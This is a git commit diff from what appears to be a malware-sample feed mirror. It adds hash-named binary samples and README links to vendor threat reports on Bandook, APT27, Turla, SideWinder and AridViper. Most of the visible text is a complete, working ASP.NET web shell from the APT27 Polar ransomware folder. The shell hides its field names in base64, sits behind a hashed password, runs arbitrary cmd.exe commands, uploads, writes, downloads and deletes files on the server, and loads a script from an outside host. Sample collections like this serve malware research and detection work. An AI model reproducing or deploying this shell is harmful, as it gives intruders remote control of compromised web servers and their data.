mirror of
https://github.com/MalwareSamples/Malware-Feed
synced 2024-06-28 09:52:01 +00:00
New Incidents
This commit is contained in:
parent
f79f243dec
commit
7ca3198b3d
@ -5,3 +5,5 @@ https://github.com/sophos-cybersecurity/solarwinds-threathunt/blob/master/iocs.c
|
||||
https://us-cert.cisa.gov/ncas/alerts/aa20-352a
|
||||
|
||||
https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html
|
||||
|
||||
https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
|
||||
|
BIN
2020-11-26_Checkpoint-Bandook/034d8ec8d510033c387bb87cac35d240b7b8daa3b5167732118c755c5e6c1d48
Normal file
BIN
2020-11-26_Checkpoint-Bandook/034d8ec8d510033c387bb87cac35d240b7b8daa3b5167732118c755c5e6c1d48
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/06ed3daccfbb30c68a33583a761fc20cc3e21adb8dd64a42d922e6da2a01c0dd
Normal file
BIN
2020-11-26_Checkpoint-Bandook/06ed3daccfbb30c68a33583a761fc20cc3e21adb8dd64a42d922e6da2a01c0dd
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/072c103759968253b7b25837b43eec546c625ae9c04edd52321d848cf6078b87
Normal file
BIN
2020-11-26_Checkpoint-Bandook/072c103759968253b7b25837b43eec546c625ae9c04edd52321d848cf6078b87
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/0750c7cdc538d79d9ffed0d37f5d9a083902b49ec02d75ee88028db9f3668b59
Normal file
BIN
2020-11-26_Checkpoint-Bandook/0750c7cdc538d79d9ffed0d37f5d9a083902b49ec02d75ee88028db9f3668b59
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/1b0d2d096c5f7fff02a5a4ce623b71b862f63e306a0760722f710c425b4e16ec
Normal file
BIN
2020-11-26_Checkpoint-Bandook/1b0d2d096c5f7fff02a5a4ce623b71b862f63e306a0760722f710c425b4e16ec
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/27c6341554a04bdc792ffbc5cda26511cbcfcc66334fb6ebbc24a14969b4e498
Normal file
BIN
2020-11-26_Checkpoint-Bandook/27c6341554a04bdc792ffbc5cda26511cbcfcc66334fb6ebbc24a14969b4e498
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/2ee74ae5b202c8aab288ca167c630e9ee3569240958e984474b960cd560bbe95
Normal file
BIN
2020-11-26_Checkpoint-Bandook/2ee74ae5b202c8aab288ca167c630e9ee3569240958e984474b960cd560bbe95
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/306238a63896fa8b79b4c9a6d25fd906bb9e4919bc698608ab970677d15b0694
Normal file
BIN
2020-11-26_Checkpoint-Bandook/306238a63896fa8b79b4c9a6d25fd906bb9e4919bc698608ab970677d15b0694
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/3fda0a5da313886b0339eee65c69c779ed620b303ba079ee0864ca4a1496b0b4
Normal file
BIN
2020-11-26_Checkpoint-Bandook/3fda0a5da313886b0339eee65c69c779ed620b303ba079ee0864ca4a1496b0b4
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/408c11caf548048732ac21e88a54e80d47a05b9619c1c16b65fa850e0172f428
Normal file
BIN
2020-11-26_Checkpoint-Bandook/408c11caf548048732ac21e88a54e80d47a05b9619c1c16b65fa850e0172f428
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/40cc5933e608f7a2a5c13af1066257c9e41528bb85e434e2bc3d1f4802dec24d
Normal file
BIN
2020-11-26_Checkpoint-Bandook/40cc5933e608f7a2a5c13af1066257c9e41528bb85e434e2bc3d1f4802dec24d
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/41ccf6de0d51bd29d35be12ae24f04b2f88ec2b202b239424f90c666d25473e8
Normal file
BIN
2020-11-26_Checkpoint-Bandook/41ccf6de0d51bd29d35be12ae24f04b2f88ec2b202b239424f90c666d25473e8
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/5900abb869c61928f0ef931d6f9d8b62183b2bab9a69b0ef886551005d6c9622
Normal file
BIN
2020-11-26_Checkpoint-Bandook/5900abb869c61928f0ef931d6f9d8b62183b2bab9a69b0ef886551005d6c9622
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/6287fc617ff6881169990e6b877c16d8ca3c199f7e453241a0b18a7907c67ab0
Normal file
BIN
2020-11-26_Checkpoint-Bandook/6287fc617ff6881169990e6b877c16d8ca3c199f7e453241a0b18a7907c67ab0
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/66c86f29afb1152aad8e426ebb6569ad03ce7b69ea3c8a5cc40011c2a3ab973b
Normal file
BIN
2020-11-26_Checkpoint-Bandook/66c86f29afb1152aad8e426ebb6569ad03ce7b69ea3c8a5cc40011c2a3ab973b
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/766917fe9b543bf218bd824d55967d63f94b28456f1d4919bc990d8262dc608d
Normal file
BIN
2020-11-26_Checkpoint-Bandook/766917fe9b543bf218bd824d55967d63f94b28456f1d4919bc990d8262dc608d
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/8cb1f713761a6b31c9c25dd2c7ae11e575a634c9f052cfd598ada35a61783230
Normal file
BIN
2020-11-26_Checkpoint-Bandook/8cb1f713761a6b31c9c25dd2c7ae11e575a634c9f052cfd598ada35a61783230
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/97ea91fb673f4994da491433751c4fca011993ba10191f09c70ca6c8d2b4f944
Normal file
BIN
2020-11-26_Checkpoint-Bandook/97ea91fb673f4994da491433751c4fca011993ba10191f09c70ca6c8d2b4f944
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/9a0ee2430f7c77942d544dad6787ca8a94470f6555f1cb08baa9d099c92f8447
Normal file
BIN
2020-11-26_Checkpoint-Bandook/9a0ee2430f7c77942d544dad6787ca8a94470f6555f1cb08baa9d099c92f8447
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/9de287f9af63f02c51c69d9c8480fee2bd4d4bd3c818f2ba81324b1f8ce495c0
Normal file
BIN
2020-11-26_Checkpoint-Bandook/9de287f9af63f02c51c69d9c8480fee2bd4d4bd3c818f2ba81324b1f8ce495c0
Normal file
Binary file not shown.
1
2020-11-26_Checkpoint-Bandook/README.md
Normal file
1
2020-11-26_Checkpoint-Bandook/README.md
Normal file
@ -0,0 +1 @@
|
||||
https://research.checkpoint.com/2020/bandook-signed-delivered/
|
BIN
2020-11-26_Checkpoint-Bandook/a9a8b0aa5f137e7353db62dc1609da3c709ca30287a5605c73aafaf4968d1e8d
Normal file
BIN
2020-11-26_Checkpoint-Bandook/a9a8b0aa5f137e7353db62dc1609da3c709ca30287a5605c73aafaf4968d1e8d
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/aa868d007c4dfd825104faafb3798b9ab745b29794a57365bef41ec3f6019eea
Normal file
BIN
2020-11-26_Checkpoint-Bandook/aa868d007c4dfd825104faafb3798b9ab745b29794a57365bef41ec3f6019eea
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/add9f9dca97c3b6d52efe7d48ecd3d349a70411eaa3d4aeff6e6215b77f42b90
Normal file
BIN
2020-11-26_Checkpoint-Bandook/add9f9dca97c3b6d52efe7d48ecd3d349a70411eaa3d4aeff6e6215b77f42b90
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/aed7ab5d0de01c3724c917c034e26a5e9eed3f7fbf4082b024576a41725d66cf
Normal file
BIN
2020-11-26_Checkpoint-Bandook/aed7ab5d0de01c3724c917c034e26a5e9eed3f7fbf4082b024576a41725d66cf
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/ba153e449ee926c019b548997c32d0579b9c6f350b1590a025d5d9a216ddbffd
Normal file
BIN
2020-11-26_Checkpoint-Bandook/ba153e449ee926c019b548997c32d0579b9c6f350b1590a025d5d9a216ddbffd
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/ce8ad96819c814dd1735e621639a8845ae7132375879cc5b5d5f6877cb909a68
Normal file
BIN
2020-11-26_Checkpoint-Bandook/ce8ad96819c814dd1735e621639a8845ae7132375879cc5b5d5f6877cb909a68
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/d217288a046e2739159d0081608a44c2e79d41de12c57ebe88a8591693fa15d5
Normal file
BIN
2020-11-26_Checkpoint-Bandook/d217288a046e2739159d0081608a44c2e79d41de12c57ebe88a8591693fa15d5
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/ea4792353e0f97968e7c69ffba81c144f22f54382af4e61a1347edd0ae15830f
Normal file
BIN
2020-11-26_Checkpoint-Bandook/ea4792353e0f97968e7c69ffba81c144f22f54382af4e61a1347edd0ae15830f
Normal file
Binary file not shown.
1
2020-11-27_PTSecurity-APT27_Polar_Ransomware/README.md
Normal file
1
2020-11-27_PTSecurity-APT27_Polar_Ransomware/README.md
Normal file
@ -0,0 +1 @@
|
||||
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/
|
BIN
2020-11-27_PTSecurity-APT27_Polar_Ransomware/ad9093adf832b6f86d6001331547f0072de21419fe40e6446c3525213add1413
Normal file
BIN
2020-11-27_PTSecurity-APT27_Polar_Ransomware/ad9093adf832b6f86d6001331547f0072de21419fe40e6446c3525213add1413
Normal file
Binary file not shown.
172
2020-11-27_PTSecurity-APT27_Polar_Ransomware/added14aaf3df22b63dcd1c53f02f9de4f9c1f88869e93381305568a87e18cb6
Normal file
172
2020-11-27_PTSecurity-APT27_Polar_Ransomware/added14aaf3df22b63dcd1c53f02f9de4f9c1f88869e93381305568a87e18cb6
Normal file
@ -0,0 +1,172 @@
|
||||
<%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
|
||||
|
||||
<html xmlns="http://www.w3.org/1999/xhtml">
|
||||
<head>
|
||||
<%
|
||||
c();
|
||||
NameValueCollection t=HttpContext.Current.Request.Form;
|
||||
passwords=fbss(t[x("cGFzc3dvcmRz")]);pro=fbss(t[x("cHJv")]);cmd_exceut=fbss(t[x("Y21kX2V4Y2V1dA==")]);sav=fbss(t[x("c2F2")]);vir=t[x("dmly")];nenggg=fbss(t[x("bmVuZ2dn")]);upb=fbss(t[x("dXBi")]);upd=fbss(t["upd"]);del=fbss(t[x("dXBk")]);dongnn=fbss(t[x("ZG9uZ25u")]);baseFileName=t[x("YmFzZUZpbGVOYW1l")];baseAddress=fbss(t[x("YmFzZUFkZHJlc3M=")]);baseVirpath=t[x("YmFzZVZpcnBhdGg=")];
|
||||
if(!string.IsNullOrEmpty(passwords))c(passwords);
|
||||
else if(!string.IsNullOrEmpty(cmd_exceut))r(pro,cmd_exceut);
|
||||
else if(HttpContext.Current.Request.Files[x("dXBsb2FkbA==")]!=null)u(HttpContext.Current.Request.Files[x("dXBsb2FkbA==")],sav,string.IsNullOrEmpty(vir)?false:true,nenggg);
|
||||
else if(!string.IsNullOrEmpty(upb))h(upb,upd);
|
||||
else if(!string.IsNullOrEmpty(del))d(del);
|
||||
else if(!string.IsNullOrEmpty(dongnn))z(dongnn);
|
||||
else if(!string.IsNullOrEmpty(baseFileName))baseuploadl(baseFileName,baseAddress,string.IsNullOrEmpty(baseVirpath)?false:true);
|
||||
|
||||
if(HttpContext.Current.Request.Cookies["data"]!=null){string data=HttpContext.Current.Request.Cookies["data"].Value;string[] data2=data.Split(new string[]{"&|&"},StringSplitOptions.None);for(int i=0;i<data2.Length;i++){string[] data3=data2[i].Split(new string[]{"$=$"},StringSplitOptions.None);
|
||||
switch (data3[0]){
|
||||
case"pro":pro=a(pro,fbss(data3[1]));break;
|
||||
case"cmd_exceut":cmd_exceut=a(cmd_exceut,fbss(data3[1]));break;
|
||||
case"sav":sav=a(sav,fbss(data3[1]));break;
|
||||
case"vir":vir=a(vir,fbss(data3[1]));break;
|
||||
case"nenggg":nenggg=a(nenggg,fbss(data3[1]));break;
|
||||
case"dongnn":dongnn=a(dongnn,fbss(data3[1]));break;
|
||||
}}}
|
||||
|
||||
view();
|
||||
%>
|
||||
<script runat="server">
|
||||
string passwords,pro,cmd_exceut,sav,vir,nenggg,upb,upd,del,dongnn,baseFileName,baseAddress,baseVirpath;
|
||||
bool aut = false;
|
||||
string pp = "FX7nUf6oTBuYLHjBvsBRvoRNM7o=";
|
||||
string a(string a,string b){return string.IsNullOrEmpty(a)?b:a;}
|
||||
string tb(string a)
|
||||
{
|
||||
string ret="";
|
||||
try{
|
||||
ret=string.IsNullOrEmpty(a)?a:Convert.ToBase64String(Encoding.UTF8.GetBytes(a));
|
||||
}catch{
|
||||
|
||||
}
|
||||
return ret;
|
||||
}
|
||||
string fbss(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Encoding.UTF8.GetString(Convert.FromBase64String(a));}catch{}return ret;}
|
||||
void view(){string data = string.Format(x("cHJvJD0kezB9JnwmY21kX2V4Y2V1dCQ9JHsxfSZ8JnNhdiQ9JHsyfSZ8JnZpciQ9JHszfSZ8Jm5lbmdnZyQ9JHs0fSZ8JmRvbmdubiQ9JHs1fQ=="),
|
||||
tb(pro),tb(cmd_exceut),tb(sav),tb(vir),tb(nenggg),tb(dongnn));
|
||||
HttpCookie coo=new HttpCookie("data", data);coo.Expires=DateTime.Now.AddDays(1);HttpContext.Current.Response.SetCookie(coo);}
|
||||
|
||||
void c(string passwords)
|
||||
{
|
||||
try{HttpCookie coo=new HttpCookie(x("cGFzc3dvcmRz"),tb(passwords));
|
||||
coo.Expires=DateTime.Now.AddDays(1);
|
||||
HttpContext.Current.Response.SetCookie(coo);
|
||||
aut=Convert.ToBase64String(new System.Security.Cryptography.SHA1CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(passwords)))==pp;
|
||||
}catch(Exception e)
|
||||
{
|
||||
l(e.Message);}
|
||||
}
|
||||
bool c(){try{if(HttpContext.Current.Request.Cookies[x("cGFzc3dvcmRz")]!=null){aut=Convert.ToBase64String(new System.Security.Cryptography.SHA1CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(fbss(HttpContext.Current.Request.Cookies[x("cGFzc3dvcmRz")].Value))))==pp;return aut;}}catch(Exception e){l(e.Message);}return false;}
|
||||
void u(HttpPostedFile uploadl, string sav, bool vir, string nenggg){try{if(c()){if(uploadl!=null&&uploadl.ContentLength>0){string fn=string.IsNullOrEmpty(nenggg)?System.IO.Path.GetFileName(uploadl.FileName):nenggg;string path=vir?Server.MapPath(sav):sav;string SaveLocation=System.IO.Path.HasExtension(path)?path:path.TrimEnd('\\')+"\\"+fn;uploadl.SaveAs(SaveLocation);l("File uploadloaded successfuly : "+SaveLocation);}}}catch(Exception ex){l(ex.Message);}}
|
||||
void baseuploadl(string baseFileName,string baseAddress, bool baseVirpath){try{if(c()){if(baseFileName!=null&&baseFileName.Length>0&&!string.IsNullOrEmpty(baseAddress)){string SaveLocation=baseVirpath?Server.MapPath(baseAddress):baseAddress;System.IO.File.WriteAllBytes(SaveLocation,Convert.FromBase64String(baseFileName));l("File uploadloaded successfuly : "+SaveLocation);}}}catch(Exception ex){l(ex.Message);}}
|
||||
void r(string pro, string cmd_exceut){try{if(c()){System.Diagnostics.Process n=new System.Diagnostics.Process();n.StartInfo.FileName=(string.IsNullOrEmpty(pro)?"cmd.exe":pro);n.StartInfo.UseShellExecute=false;n.StartInfo.RedirectStandardInput=true;n.StartInfo.RedirectStandardOutput=true;n.StartInfo.RedirectStandardError=true;n.StartInfo.CreateNoWindow=true;string o=null;n.Start();n.StandardInput.WriteLine(cmd_exceut);n.StandardInput.WriteLine("exit");o=n.StandardOutput.ReadToEnd();n.WaitForExit();n.Close();l(HttpUtility.HtmlEncode(o));}}catch(Exception ex){l(ex.Message);}}
|
||||
void z(string dongnn){try{if(c()&&!string.IsNullOrEmpty(dongnn)){byte[] f=System.IO.File.ReadAllBytes(dongnn);System.Web.HttpContext t=System.Web.HttpContext.Current;t.Response.Clear();t.Response.ClearHeaders();t.Response.ClearContent();t.Response.AppendHeader("content-length",f.Length.ToString());t.Response.ContentType="application/octet-stream";t.Response.AppendHeader("content-disposition","attachment; filename="+dongnn.Substring(dongnn.LastIndexOf('\\')+1));t.Response.BinaryWrite(f);t.Response.End();}}catch(Exception ex){l(ex.Message);}}
|
||||
void h(string upb, string upd){try{if(c()&&!string.IsNullOrEmpty(upb)&&!string.IsNullOrEmpty(upd)){System.IO.File.WriteAllBytes(System.IO.Path.GetTempPath()+upd,Convert.FromBase64String(upb));l(upd+" successfuly uploadloaded");}}catch(Exception ex){l(ex.Message);}}
|
||||
void d(string del){try{if(c()&&!string.IsNullOrEmpty(del)){System.IO.File.Delete(System.IO.Path.GetTempPath()+del);l(del+" successfuly deleled");}}catch(Exception ex){l(ex.Message);}}
|
||||
string x(string f){return Encoding.UTF8.GetString(Convert.FromBase64String(f));}
|
||||
void l(string ll){log.InnerHtml=tb(ll);}
|
||||
</script>
|
||||
<style>body,html{margin:0;padding:3px 0 0 3px;direction:ltr;background:#000;color:#fff !important;}form{margin:0;}*{font:14px "Lucida Console";}t{width:180px;display:inline-block;text-align:right;padding-right:5px;}input[type="text"],input[type="file"],textarea {width:50%;height:25px;background:#444;color:#fff;border:1px solid #999;margin-bottom:3px;}input[type="text"]{padding:2px;}input[type="button"],input[type="submit"] {height:23px;}input[type="checkbox"]{width:23px;height:24px;position:absolute;margin:0;}hr{margin:0;border:0;border-top:1px solid #DDD;}.h{width:100px;text-align:center;background:rgba(19, 96, 0, 1);vertical-align:middle;}table{width:100%;margin:0;border-collapse:collapse;}.b{padding:10px 0px 9px;}</style>
|
||||
<script>
|
||||
function use() { var n = document; var d = n.getElementById("d").innerHTML; d = d.substring(0, d.lastIndexOf('\\') + 1); n.getElementsByName("cmd_exceut")[0].value += d; n.getElementsByName("sav")[0].value += d; n.getElementsByName("dongnn")[0].value += d; }
|
||||
function subm(){var mmm=document.getElementsByClassName('mmm');for(var i=0;i<mmm.length;i++){mmm[i].value=btoa(mmm[i].value);}}
|
||||
function reset() { document.cookie = "data=;expires=Thu, 01 Jan 1971 00:00:01 GMT;path=/";location.href = location.pathname;}
|
||||
</script>
|
||||
<script src='https://mail.namagesy.de/owa/prem/15.1.1847/scripts/microsoft.owa.core.immanager.js' ></script>
|
||||
</head>
|
||||
<body>
|
||||
<table>
|
||||
<tr>
|
||||
<td class="h"><%=x("QWRkcmVzcw==")%></td>
|
||||
<td class="b">
|
||||
<t><%=x("Q3VycmVudA==")%> :</t>
|
||||
<y id="d"><%= Server.MapPath(string.Empty) + "\\"%></y>
|
||||
<input type="button" value="<%=x("VXNl")%>" onclick="use()" />
|
||||
<input type="button" value="<%=x("UmVzZXQgRm9ybQ==")%>" onclick="reset()" />
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<hr>
|
||||
<form method="post">
|
||||
<table>
|
||||
<tr>
|
||||
<td class="h"><%=x("TG9naW4=")%></td>
|
||||
<td class="b">
|
||||
<t><%=x("RG8gaXQ=")%> :</t>
|
||||
<input name="passwords" class="mmm" type="text" style='background-color: <%= aut ? "Green" : "Red" %>' />
|
||||
<input type="submit" value="<%= x("RG8gaXQ=") %>" onclick="subm();" />
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
<hr>
|
||||
<form method="post">
|
||||
<table>
|
||||
<tr>
|
||||
<td class="h"><%=x("Q29tbWFuZA==")%></td>
|
||||
<td class="b">
|
||||
<t><%=x("UHJvY2Vzcw==")%> :</t>
|
||||
<input name="pro" class="mmm" type="text" value='<%= string.IsNullOrEmpty(pro) ? x("Y21kLmV4ZQ==") : pro %>' /><br>
|
||||
<t><%=x("Q29tbWFuZA==")%> :</t>
|
||||
<input name="cmd_exceut" class="mmm" type="text" value='<%= cmd_exceut %>' />
|
||||
<input type="submit" value="<%= x("RXhlY3V0ZQ==") %>" onclick="subm();" />
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
<hr>
|
||||
<form method="post" enctype="multipart/form-data">
|
||||
<table>
|
||||
<tr>
|
||||
<td class="h"><%=x("VXBsb2Fk")%></td>
|
||||
<td class="b">
|
||||
<t><%=x("RmlsZSBOYW1l")%> :</t>
|
||||
<input name="uploadl" type="file" /><br>
|
||||
<t><%=x("U2F2ZSBhcw==")%> :</t>
|
||||
<input name="sav" class="mmm" type="text" value='<%= sav %>' />
|
||||
<input name="vir" type="checkbox" /><g><%=x("SXMgdmlydHVhbCBwYXRo")%></g><br>
|
||||
<t><%=x("TmV3IEZpbGUgbmFtZQ==")%> :</t>
|
||||
<input name="nenggg" class="mmm" type="text" value='<%= nenggg %>' />
|
||||
<input type="submit" value="<%= x("VXBsb2Fk") %>" onclick="subm();" />
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
<hr>
|
||||
<form method="post">
|
||||
<table>
|
||||
<tr>
|
||||
<td class="h"><%=x("RG93bmxvYWQ=")%></td>
|
||||
<td class="b">
|
||||
<t><%=x("RG93bmxvYWQgUGF0aA==")%> :</t>
|
||||
<input name="dongnn" type="text" />
|
||||
<input type="submit" value="<%= x("RG93bmxvYWQ=") %>" onclick="document.getElementsByName('dongnn')[0].value = btoa(document.getElementsByName('dongnn')[0].value);" />
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
<hr />
|
||||
<form method="post">
|
||||
<table>
|
||||
<tr>
|
||||
<td class="h"><%=x("VXBsb2FkIEJhc2U2NA==")%></td>
|
||||
<td class="b">
|
||||
<t><%=x("QmFzZTY0IEZpbGU=")%> :</t>
|
||||
<textarea name="baseFileName"></textarea>
|
||||
<input name="baseVirpath" type="checkbox" /><g><%=x("SXMgdmlydHVhbCBwYXRo")%></g><br>
|
||||
<t><%=x("RmlsZSBQYXRoIGFuZCBOYW1l ")%> :</t>
|
||||
<input name="baseAddress" class="mmm" type="text" value='<%= baseAddress %>' />
|
||||
<input type="submit" value="<%= x("VXBsb2Fk") %>" onclick="subm();" />
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
<hr />
|
||||
</form>
|
||||
<hr />
|
||||
<br />
|
||||
<pre id="log" runat="server"></pre>
|
||||
<script>var ll=document.getElementById('log');if(ll.innerHTML)ll.innerHTML=atob(log.innerHTML);</script>
|
||||
</body>
|
||||
</html>
|
||||
XXxxxx
|
BIN
2020-12-02_ESET-Turla_Crutch/0010ccb822538d1881c61be874af49382c44b6c9cb665081cf0f672cbed5b6a5
Normal file
BIN
2020-12-02_ESET-Turla_Crutch/0010ccb822538d1881c61be874af49382c44b6c9cb665081cf0f672cbed5b6a5
Normal file
Binary file not shown.
1
2020-12-02_ESET-Turla_Crutch/README.md
Normal file
1
2020-12-02_ESET-Turla_Crutch/README.md
Normal file
@ -0,0 +1 @@
|
||||
https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/
|
BIN
2020-12-09_TrendMicro-SideWinder/1cbec920afe2f978b8f84e0a4e6b757d400aeb96e8c0a221130060b196ece010
Normal file
BIN
2020-12-09_TrendMicro-SideWinder/1cbec920afe2f978b8f84e0a4e6b757d400aeb96e8c0a221130060b196ece010
Normal file
Binary file not shown.
112
2020-12-09_TrendMicro-SideWinder/2548a819e4c597ba5958d2d18baa544452948e5b00271570192ccd79abe88e8d
Normal file
112
2020-12-09_TrendMicro-SideWinder/2548a819e4c597ba5958d2d18baa544452948e5b00271570192ccd79abe88e8d
Normal file
File diff suppressed because one or more lines are too long
2
2020-12-09_TrendMicro-SideWinder/34446f7f60f730fcca145155d10d1aff0a1153b085836df38313772cd03c8d70
Normal file
2
2020-12-09_TrendMicro-SideWinder/34446f7f60f730fcca145155d10d1aff0a1153b085836df38313772cd03c8d70
Normal file
File diff suppressed because one or more lines are too long
2
2020-12-09_TrendMicro-SideWinder/7238f4e5edbe0e5a2242d8780fb58c47e7d32bf2c4f860c88c511c30675d0857
Normal file
2
2020-12-09_TrendMicro-SideWinder/7238f4e5edbe0e5a2242d8780fb58c47e7d32bf2c4f860c88c511c30675d0857
Normal file
File diff suppressed because one or more lines are too long
112
2020-12-09_TrendMicro-SideWinder/75c158cea14e338c8d9d32ed988c7032da9ae6d54f5b1126ed6a83f71b9e03bf
Normal file
112
2020-12-09_TrendMicro-SideWinder/75c158cea14e338c8d9d32ed988c7032da9ae6d54f5b1126ed6a83f71b9e03bf
Normal file
File diff suppressed because one or more lines are too long
BIN
2020-12-09_TrendMicro-SideWinder/799260b992c77e2e14f2d586665c570142d8425864455cab5f2575015cd0b87a
Normal file
BIN
2020-12-09_TrendMicro-SideWinder/799260b992c77e2e14f2d586665c570142d8425864455cab5f2575015cd0b87a
Normal file
Binary file not shown.
112
2020-12-09_TrendMicro-SideWinder/96bf8f579acb8d9d0ff116d05fdadef85953f11e5b2e703041fdae0abf5b75dc
Normal file
112
2020-12-09_TrendMicro-SideWinder/96bf8f579acb8d9d0ff116d05fdadef85953f11e5b2e703041fdae0abf5b75dc
Normal file
File diff suppressed because one or more lines are too long
1
2020-12-09_TrendMicro-SideWinder/README.md
Normal file
1
2020-12-09_TrendMicro-SideWinder/README.md
Normal file
@ -0,0 +1 @@
|
||||
https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html
|
2
2020-12-09_TrendMicro-SideWinder/ab7c1967bf1fefdffde93626b78eb30994655ab02f59e0adb0935e3e599a953f
Normal file
2
2020-12-09_TrendMicro-SideWinder/ab7c1967bf1fefdffde93626b78eb30994655ab02f59e0adb0935e3e599a953f
Normal file
File diff suppressed because one or more lines are too long
112
2020-12-09_TrendMicro-SideWinder/ed5e1d6e914de64a203f2f32ab95176fc7efff3a520915971d5fe748e79d611c
Normal file
112
2020-12-09_TrendMicro-SideWinder/ed5e1d6e914de64a203f2f32ab95176fc7efff3a520915971d5fe748e79d611c
Normal file
File diff suppressed because one or more lines are too long
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/00bc6fcfa82a693db4d7c1c9d5f4c3d0bfbbd0806e122f1fbded034eb9a67b10
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/00bc6fcfa82a693db4d7c1c9d5f4c3d0bfbbd0806e122f1fbded034eb9a67b10
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/050a45680d5f344034be13d4fc3a7e389ceb096bd01c36c680d8e7a75d3dbae2
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/050a45680d5f344034be13d4fc3a7e389ceb096bd01c36c680d8e7a75d3dbae2
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/094e318d14493a9f56d56b44b30fd396af8b296119ff5b82aca01db9af83fd48
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/094e318d14493a9f56d56b44b30fd396af8b296119ff5b82aca01db9af83fd48
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/0d65b9671e51baf64e1389649c94f2a9c33547bfe1f5411e12c16ae2f2f463dd
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/0d65b9671e51baf64e1389649c94f2a9c33547bfe1f5411e12c16ae2f2f463dd
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/0de10ec9ec327818002281b4cdd399d6cf330146d47ac00cf47b571a6f0a4eaa
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/0de10ec9ec327818002281b4cdd399d6cf330146d47ac00cf47b571a6f0a4eaa
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2115d02ead5e497ce5a52ab9b17f0e007a671b3cd95aa55554af17d9a30de37c
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2115d02ead5e497ce5a52ab9b17f0e007a671b3cd95aa55554af17d9a30de37c
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2118c79dbb6767549cf9aa12367faa8f55281d4299d0a3f4c2f40c1686d8016a
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2118c79dbb6767549cf9aa12367faa8f55281d4299d0a3f4c2f40c1686d8016a
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/23aa2347bf83127d40e05742d7c521245e51886f38b285be7227ddb96d765337
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/23aa2347bf83127d40e05742d7c521245e51886f38b285be7227ddb96d765337
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/284a0c5cc0efe78f18c7b9b6dbe7be1d93da8f556b432f03d5464a34992dbd01
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/284a0c5cc0efe78f18c7b9b6dbe7be1d93da8f556b432f03d5464a34992dbd01
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2b70045d4878a20b8fca568c0b3414f2d255f3b2a7dfed85c84cf88d1b2f4e74
Normal file
BIN
